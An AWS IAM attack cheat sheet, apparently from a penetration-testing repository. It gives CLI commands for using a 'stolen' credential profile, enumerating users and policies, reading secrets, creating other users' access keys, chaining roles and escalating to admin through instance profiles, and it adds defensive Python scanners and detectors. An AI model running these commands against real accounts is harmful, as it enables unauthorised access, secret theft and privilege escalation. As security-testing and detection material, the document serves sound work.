cloud-aws-IAM.md

File metadata and controls

155 lines (123 loc) · 5.81 KB

~/.aws/credentials

```ini
[default]
aws_access_key_id = XXX
aws_secret_access_key = XXXX
```

```bash
export AWS_ACCESS_KEY_ID=
export AWS_SECRET_ACCESS_KEY=
export AWS_DEFAULT_REGION=
```

Check that the credentials are valid

```bash
aws sts get-caller-identity
aws sdb list-domains --region us-east-1
```

If you obtain a set of AWS credentials, add them to your configuration under a separate profile

```bash
aws configure --profile stolen
```

Open ~/.aws/credentials

Under the [stolen] section add an aws_session_token line with the discovered token value (temporary ASIA... keys are only valid together with their session token)

```bash
aws sts get-caller-identity --profile stolen
```

Get the account ID that an access key ID belongs to

```bash
aws sts get-access-key-info --access-key-id=ASIA1234567890123456
```

Basic IAM enumeration (angle brackets are placeholders)

```bash
aws iam get-account-password-policy
aws sts get-session-token
aws iam list-users
aws iam list-roles
aws iam list-access-keys --user-name <user>
aws iam create-access-key --user-name <user>
aws iam list-attached-user-policies --user-name <user>
aws iam get-policy --policy-arn <policy-arn>
aws iam get-policy-version --policy-arn <policy-arn> --version-id <version-id>
```

```bash
aws deploy list-applications
```

```bash
aws directconnect describe-connections
```

```bash
aws secretsmanager get-secret-value --secret-id <secret-id> --profile <profile>
```

```bash
aws sns publish --topic-arn arn:aws:sns:us-east-1:<account-id>:aaa --message aaa
```

IAM Prefix meaning

- ABIA - AWS STS service bearer token
- ACCA - Context-specific credential
- AGPA - Group
- AIDA - IAM user
- AIPA - Amazon EC2 instance profile
- AKIA - Access key
- ANPA - Managed policy
- ANVA - Version in a managed policy
- APKA - Public key
- AROA - Role
- ASCA - Certificate
- ASIA - Temporary (AWS STS) access key ID. These are unique only in combination with the secret access key and the session token.
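Added example (not from the original page): a small scanner that pulls AWS unique IDs out of free text such as logs or config dumps and classifies them with the prefix table above, flagging which ones need a session token to be usable. The ID length rule and the sample log lines are assumptions/constructed; the key IDs are AWS's documented examples plus one made-up ASIA value.

```python
import re

# Prefix table as listed on the page (the first four characters of an AWS unique ID)
AWS_ID_PREFIXES = {
    "ABIA": "AWS STS service bearer token",
    "ACCA": "Context-specific credential",
    "AGPA": "Group",
    "AIDA": "IAM user",
    "AIPA": "Amazon EC2 instance profile",
    "AKIA": "Access key",
    "ANPA": "Managed policy",
    "ANVA": "Version in a managed policy",
    "APKA": "Public key",
    "AROA": "Role",
    "ASCA": "Certificate",
    "ASIA": "Temporary (AWS STS) access key",
}

# Assumption: a unique ID is the 4-letter prefix followed by at least 16 uppercase
# alphanumerics (access key IDs are 20 chars, user and policy IDs are 21).
_AWS_ID_RE = re.compile(r"\b(A[A-Z]{3}[A-Z0-9]{16,})\b")


def classify_aws_id(identifier):
    """Return the meaning of an AWS unique ID's prefix, or None if the prefix is unknown."""
    return AWS_ID_PREFIXES.get(identifier[:4])


def find_aws_ids(text):
    """Scan free text (logs, config dumps) for AWS unique IDs and classify each.
    Returns [(identifier, kind, needs_session_token)]; only ASIA keys need an
    aws_session_token line in ~/.aws/credentials, AKIA keys are long-lived."""
    hits = []
    for match in _AWS_ID_RE.finditer(text):
        identifier = match.group(1)
        kind = classify_aws_id(identifier)
        if kind is not None:  # skip uppercase words that merely look like an ID
            hits.append((identifier, kind, identifier.startswith("ASIA")))
    return hits


# Constructed sample: AWS's documented example IDs plus one made-up temporary key
# (none of these are real credentials).
SAMPLE_LOG = """\
2024-01-01T00:00:00Z app: using key AKIAIOSFODNN7EXAMPLE for s3 upload
2024-01-01T00:00:05Z sts: issued ASIAEXAMPLE123456789 for the build role
2024-01-01T00:00:09Z iam: principal AIDACKCEVSQ6C2EXAMPLE attached ANPAJ2UCCR6DPCEXAMPLE
"""
```

Run `find_aws_ids(SAMPLE_LOG)` to get the four classified IDs; a leaked AKIA key is the one to rotate first, since an ASIA key expires on its own.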

TOOLS

```bash
python enumerate-iam.py --access-key XXXXXXXXXXXXX --secret-key XXXXXXXXXXX
# temporary (ASIA) credentials also need the session token
python enumerate-iam.py --access-key "ACCESSKEY" --secret-key "SECRETKEY" --session-token "$AWS_SESSION_TOKEN"
```

```bash
python aws_escalate.py
```

```bash
python2 nimbostratus dump-permissions
```

```bash
python3 scout.py aws
```

```bash
cloudsplaining download
cloudsplaining scan
```

Enumerate IAM permissions without logging (stealth mode)

Unauthenticated (only account id) Enumeration of IAM Users and Roles

AWS Consoler

Generate link to console from valid credentials

```bash
aws_consoler -a ASIAXXXX -s SECRETXXXX -t TOKENXXXX
```

AWSRoleJuggler

You can use one assumed role to assume another one

```bash
./find_circular_trust.py
python aws_role_juggler.py -r arn:aws:iam::123456789:role/BuildRole arn:aws:iam::123456789:role/GitRole arn:aws:iam::123456789:role/ArtiRole
```

```bash
python3 iamfinder.py init
python3 iamfinder.py enum_user --aws_id 123456789012
```

Check IAM permissions

IAM CLI ENUMERATION

First of all, set your profile

```bash
aws configure --profile test
profile=test  # Just for convenience, used as "$profile" below
```

Get policies available

```bash
aws --profile "$profile" iam list-policies | jq -r ".Policies[].Arn"
```

Get the default version ID of a specific policy ($i is one policy ARN from the list above)

```bash
aws --profile "$profile" iam get-policy --policy-arn "$i" --query "Policy.DefaultVersionId" --output text
```

One-liner that dumps the default version of every policy (then search the log for Action / Resource)

```bash
profile="test"; for i in $(aws --profile "$profile" iam list-policies | jq -r '.Policies[].Arn'); do echo "Describing policy $i" && aws --profile "$profile" iam get-policy-version --policy-arn "$i" --version-id $(aws --profile "$profile" iam get-policy --policy-arn "$i" --query 'Policy.DefaultVersionId' --output text); done | tee /tmp/policies.log
```

```bash
# List Managed User policies
aws --profile "test" iam list-attached-user-policies --user-name "test-user"
# List Managed Group policies
aws --profile "test" iam list-attached-group-policies --group-name "test-group"
# List Managed Role policies
aws --profile "test" iam list-attached-role-policies --role-name "test-role"
```

```bash
# List Inline User policies
aws --profile "test" iam list-user-policies --user-name "test-user"
# List Inline Group policies
aws --profile "test" iam list-group-policies --group-name "test-group"
# List Inline Role policies
aws --profile "test" iam list-role-policies --role-name "test-role"
```

```bash
# Describe Inline User policies
aws --profile "test" iam get-user-policy --user-name "test-user" --policy-name "test-policy"
# Describe Inline Group policies
aws --profile "test" iam get-group-policy --group-name "test-group" --policy-name "test-policy"
# Describe Inline Role policies
aws --profile "test" iam get-role-policy --role-name "test-role" --policy-name "test-policy"
```

Get role details, including its trust policy (AssumeRolePolicyDocument)

```bash
aws --profile "test" iam get-role --role-name "test-role"
```

Assume role from any ec2 instance (get Admin)

Create an instance profile

```bash
aws iam create-instance-profile --instance-profile-name YourNewRole-Instance-Profile
```

Associate the role with the instance profile

```bash
aws iam add-role-to-instance-profile --role-name YourNewRole --instance-profile-name YourNewRole-Instance-Profile
```

Associate the instance profile with the instance you want to use

```bash
aws ec2 associate-iam-instance-profile --instance-id YourInstanceId --iam-instance-profile Name=YourNewRole-Instance-Profile
```

Check which role the instance now holds

```bash
aws --profile test sts get-caller-identity
```
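Added example from the defender's side (not part of the original page): detection logic that correlates the three API calls of the chain above in CloudTrail and alerts when one principal creates an instance profile, adds a role to it and attaches it to an instance within a short window. The event layout is a simplified, constructed CloudTrail-style record, and the function name and window are assumptions.

```python
from datetime import datetime, timedelta

# The three API calls that make up the instance-profile escalation chain above
CHAIN = ("CreateInstanceProfile", "AddRoleToInstanceProfile", "AssociateIamInstanceProfile")


def _when(ev):
    return datetime.strptime(ev["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def _profile_name(ev):
    p = ev.get("requestParameters", {})
    # assumption: the associate call nests the profile name under iamInstanceProfile
    return p.get("instanceProfileName") or p.get("iamInstanceProfile", {}).get("name")


def detect_instance_profile_chain(events, window_minutes=60):
    """Alert when one principal performs all three chain steps on the same instance
    profile within the window. Returns [(principal_arn, profile, role, instance_id)]."""
    seen = {}  # (principal, profile) -> {eventName: event}
    for ev in sorted(events, key=_when):
        if ev.get("eventName") not in CHAIN or "errorCode" in ev:
            continue  # unrelated call, or one that failed (e.g. AccessDenied)
        key = (ev["userIdentity"]["arn"], _profile_name(ev))
        seen.setdefault(key, {})[ev["eventName"]] = ev
    alerts = []
    for (principal, profile), steps in seen.items():
        if all(s in steps for s in CHAIN) and (
            _when(steps[CHAIN[2]]) - _when(steps[CHAIN[0]]) <= timedelta(minutes=window_minutes)
        ):
            role = steps[CHAIN[1]]["requestParameters"]["roleName"]
            instance = steps[CHAIN[2]]["requestParameters"]["instanceId"]
            alerts.append((principal, profile, role, instance))
    return alerts


def _ev(time, name, user, **params):
    # constructed CloudTrail-style record; account ID is a placeholder
    return {"eventTime": time, "eventName": name,
            "userIdentity": {"arn": "arn:aws:iam::123456789012:user/" + user},
            "requestParameters": params}


# Constructed sample: user "dev" completes the chain, "ops" only does a routine attach
SAMPLE_EVENTS = [
    _ev("2024-05-01T10:00:00Z", "CreateInstanceProfile", "dev", instanceProfileName="YourNewRole-Instance-Profile"),
    _ev("2024-05-01T10:01:00Z", "AddRoleToInstanceProfile", "dev", instanceProfileName="YourNewRole-Instance-Profile", roleName="YourNewRole"),
    _ev("2024-05-01T10:02:00Z", "AssociateIamInstanceProfile", "dev", instanceId="i-0123456789abcdef0", iamInstanceProfile={"name": "YourNewRole-Instance-Profile"}),
    _ev("2024-05-01T10:03:00Z", "AssociateIamInstanceProfile", "ops", instanceId="i-0fedcba9876543210", iamInstanceProfile={"name": "WebServerProfile"}),
]
```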

Shadow admin

```bash
aws iam list-attached-user-policies --user-name <user>
aws iam get-policy-version --policy-arn <policy-arn> --version-id $(aws iam get-policy --policy-arn <policy-arn> --query 'Policy.DefaultVersionId' --output text)
aws iam list-user-policies --user-name <user>
aws iam get-user-policy --policy-name <policy-name-from-above> --user-name <user> | python -m json.tool
```

Vulnerable permissions (each one is enough to escalate to another user's access):

- iam:CreateUser
- iam:CreateLoginProfile
- iam:UpdateLoginProfile
- iam:AddUserToGroup
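Added example (not from the original page): an offline analyser for the policy documents dumped by the enumeration one-liner and the shadow-admin commands above. It reports every Allow statement that grants one of the listed vulnerable permissions, including grants hidden behind wildcards (`iam:*`, `iam:Create*`) and `NotAction`, and subtracts explicit Deny statements. The function name, the sample policy and the simplified Deny handling are assumptions.

```python
import fnmatch
import json

# The permissions listed on the page as privilege-escalation primitives
DANGEROUS_ACTIONS = ("iam:CreateUser", "iam:CreateLoginProfile",
                     "iam:UpdateLoginProfile", "iam:AddUserToGroup")


def _as_list(value):
    return [] if value is None else (value if isinstance(value, list) else [value])


def _matches(pattern, action):
    # IAM action matching is case-insensitive and supports * and ? wildcards
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def find_shadow_admin_grants(policy_doc):
    """Return [(sid, action, resource)] for each DANGEROUS action the policy allows,
    whether directly, via wildcards (iam:*, iam:Create*) or via NotAction.
    Assumption: an explicit Deny on the action cancels it regardless of Resource/Condition."""
    allowed, denied = [], set()
    for i, st in enumerate(_as_list(policy_doc.get("Statement"))):
        sid = st.get("Sid", f"statement{i}")
        patterns = _as_list(st.get("NotAction") if "NotAction" in st else st.get("Action"))
        for action in DANGEROUS_ACTIONS:
            hit = any(_matches(p, action) for p in patterns)
            if "NotAction" in st:
                hit = not hit  # NotAction grants everything the patterns do not name
            if not hit:
                continue
            if st.get("Effect") == "Deny":
                denied.add(action)
            else:
                allowed.extend((sid, action, r) for r in _as_list(st.get("Resource", "*")))
    return [g for g in allowed if g[1] not in denied]


# Constructed sample policy: a read-only block, an over-broad onboarding wildcard,
# a NotAction catch-all and one explicit Deny (account ID is a placeholder).
SAMPLE_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "ReadOnly", "Effect": "Allow", "Action": ["iam:Get*", "iam:List*"], "Resource": "*"},
    {"Sid": "Onboarding", "Effect": "Allow", "Action": "iam:Create*",
     "Resource": "arn:aws:iam::123456789012:user/*"},
    {"Sid": "Everything", "Effect": "Allow", "NotAction": "s3:*", "Resource": "*"},
    {"Sid": "NoGroups", "Effect": "Deny", "Action": "iam:AddUserToGroup", "Resource": "*"}
  ]
}""")
```

Feed it the `get-policy-version` output (`json.loads(...)["PolicyVersion"]["Document"]`) to triage a whole account's policies; a real evaluator also has to weigh Conditions and resource scoping, which this deliberately ignores.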